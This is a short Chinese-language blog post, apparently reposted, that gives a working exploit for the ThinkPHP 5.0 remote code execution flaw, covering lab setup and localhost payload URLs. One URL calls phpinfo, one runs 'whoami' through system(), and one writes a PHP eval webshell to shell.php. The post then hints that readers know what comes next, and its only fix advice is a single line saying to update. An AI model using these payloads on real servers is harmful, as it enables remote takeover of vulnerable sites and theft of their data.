thinkphp5.0遠程執行漏洞


0x01 漏洞簡介

由於ThinkPHP5 框架控制器名 沒有進行足夠的安全監測,導致在沒有開啟強制路由的情況下,可以偽裝特定的請求可以直接Getshell(可以控制服務器)

 

0x02 環境搭建

Phpstudy:  php-5.5.38+Apache

下載存在漏洞版本我下載的版本是thinkphp_5.0.22搭建好以后如圖

下載鏈接:http://www.thinkphp.cn/donate/download/id/1261.html

 

 

 

0x03 漏洞payload

 Phpinfo頁面:

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

執行whoami命令:

http://127.0.0.1/thinkphp_5.0.22/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 

 

 

 

 

shell

 

http://127.0.0.1/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php

 

然后就你們就知道該怎么做了吧。

哈哈哈

 

0X03漏洞修復

建議更新到最新版本

 

企鵝群:1045867209

 

博主公眾號

 

 

本文歡迎轉載。 如轉載請務必注明出處。 覺得寫的不錯的可以右側打賞一手。 群在上邊歡迎大家來撩。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM